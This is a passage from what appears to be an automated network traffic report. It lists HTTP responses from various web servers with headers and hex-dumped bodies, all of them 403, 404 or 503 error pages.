6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:13 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:54:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:13 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: tXZ2CY70/ArIoCQSSData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:54:14 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:13 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:54:13 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:13 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:14 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd9SdXPLd+IHpGdJMT+4ixQ,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1690487654.49918405464216489X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 google
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FnYyrfmcwQsV7SRSVEDNdE92gqKJMKyAH6e0%2BXBbp%2BYIfPlhcNsKmGQGwU0TrAv0MdJSWhltV5JkpTaMUKi8vN%2FFtV2ijJbQ%2BcTKA98POe%2FBkndngtjr%2FCjnjkE5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76ee23876383d-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:54:15 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 